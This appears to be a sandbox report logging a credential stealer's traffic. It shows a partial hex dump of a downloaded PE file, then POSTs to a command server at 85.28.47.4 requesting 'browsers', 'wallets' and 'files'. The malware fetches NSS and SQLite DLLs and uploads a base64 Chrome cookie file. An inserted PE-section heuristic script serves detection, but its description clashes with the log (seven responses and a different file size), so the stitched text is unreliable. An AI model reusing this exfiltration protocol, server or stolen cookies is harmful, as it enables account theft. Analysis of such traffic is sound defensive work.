Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jun 2024 06:16:42 GMTContent-Type: application/octet-streamContent-Length: 2499584Last-Modified: Wed, 26 Jun 2024 04:18:01 GMTConnection: keep-aliveETag: "667b9679-262400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 0c db be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 be 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 30 9d 00 b7 0d 00 00 d8 3d 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 40 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 f0 21 00 00 00 9d 00 00 f0 21 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
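The seven 200 OK responses above are PE images, and each "Data Raw" dump captures enough of the file to reach the section table. The 1917952-byte download served by nginx declares seven sections whose names are, in order, three spaces, .rsrc, .idata padded with two spaces, eight spaces, kcajosdi, tlivgrwy and .taggant; every section except .rsrc and .idata carries characteristics 0xe0000040 (initialized data, readable, writable, executable), and the all-space section is 0x200 bytes on disk but 0x2b1000 bytes in memory. The Python below is an added example, not part of this report or of any analysis tool: it parses a section table out of such a header prefix and applies heuristics that correspond to the report's nameless-section, special-character and RWX observations. Function names are the example's own. The sample header is constructed inside the block with struct.pack from the values read off that dump; the DOS stub, Rich header and most of the optional header are zero-filled because the parser never reads them.

```python
import struct

# Section flag bits from the PE/COFF specification
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Bytes a linker-emitted section name is normally made of
NAME_CHARS = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")


def hexdump_to_bytes(dump: str) -> bytes:
    """Convert a report-style 'Data Raw' string ('4d 5a 90 00 ...') to bytes."""
    return bytes.fromhex("".join(dump.split()))


def parse_sections(data: bytes) -> list[dict]:
    """Walk DOS header -> PE signature -> COFF header -> section table.

    Only the headers are read, so a truncated capture is enough as long as it
    reaches the end of the section table.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symtab, _nsyms, opt_size, _flags = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size               # COFF header is 20 bytes, then the optional header
    if len(data) < table + nsections * 40:
        raise ValueError("capture ends before the section table does")
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rsize, rptr, _rel, _lin, _nrel, _nlin, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + i * 40)
        sections.append({"name": name, "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": rsize, "raw_ptr": rptr, "characteristics": chars})
    return sections


def suspicious_sections(sections: list[dict]) -> list[tuple[int, str]]:
    """Heuristics behind the nameless / special-chars / RWX style of finding."""
    findings = []
    for i, s in enumerate(sections):
        name, chars = s["name"], s["characteristics"]
        if name.strip(b" \0") == b"":
            findings.append((i, "nameless"))          # blank or all-space name
        elif any(b not in NAME_CHARS for b in name.rstrip(b"\0")):
            findings.append((i, "special-chars"))     # spaces or non-identifier bytes in the name
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append((i, "rwx"))               # writable and executable: unpack / self-modifying code
        if s["virtual_size"] >= 16 * max(s["raw_size"], 1) and s["virtual_size"] >= 0x10000:
            findings.append((i, "inflated"))          # tiny on disk, huge in memory: unpacking destination
    return findings


def build_sample_header() -> bytes:
    """Constructed sample: section values mirror the nginx-served 1917952-byte download."""
    e_lfanew = 0x108
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    sections = [  # (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics)
        (b"   \0    ", 0x66000, 0x1000, 0x2D800, 0x1000, 0xE0000040),
        (b".rsrc\0\0\0", 0x1E0, 0x67000, 0x200, 0x2E800, 0xC0000040),
        (b".idata  ", 0x1000, 0x68000, 0x200, 0x2EA00, 0xC0000040),
        (b"        ", 0x2B1000, 0x69000, 0x200, 0x2EC00, 0xE0000040),
        (b"kcajosdi", 0x1A3000, 0x31A000, 0x1A3000, 0x2EE00, 0xE0000040),
        (b"tlivgrwy", 0x1000, 0x4BD000, 0x400, 0x1D1E00, 0xE0000040),
        (b".taggant", 0x3000, 0x4BE000, 0x2200, 0x1D2200, 0xE0000040),
    ]
    opt_size = 0xE0
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x66505957, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")   # PE32 magic, rest unused here
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in sections)
    return dos + b"PE\0\0" + coff + optional + table


if __name__ == "__main__":
    secs = parse_sections(build_sample_header())
    for i, s in enumerate(secs):
        print(f"{i} {s['name']!r:14} va=0x{s['virtual_address']:06x} vsize=0x{s['virtual_size']:06x} "
              f"raw=0x{s['raw_size']:06x} chars=0x{s['characteristics']:08x}")
    print(suspicious_sections(secs))
```

Run stand-alone it prints the section table and the findings. To apply it to a capture, pass the Data Raw string of a response through hexdump_to_bytes() first; the report truncates the dumps, so parse_sections() raises rather than guessing when the table is cut off.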
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 31 42 33 34 46 38 43 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="hwid"2701B34F8C144293944220------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="build"default------JKEGIDGDGHCAAAAKKFCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="message"browsers------KKJDGDHIDBGIECBGHJDB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 2d 2d 0d 0a Data Ascii: ------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="message"plugins------AEBAKJDGHIIJJKFHCFCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="message"fplugins------HDGCFHIDAKECFHIEBFCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHIHost: 85.28.47.4Content-Length: 7195Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 
56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCAAKJDHJJJJJKKKFBHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 2d 2d 0d 0a Data Ascii: ------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="file"------HCGCAAKJDHJJJJJKKKFB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file"------IDHIIJJJKEGIDGCBAFIJ--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="message"wallets------AAEBAFBGIDHCBFHIECFC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 2d 2d 0d 0a Data Ascii: 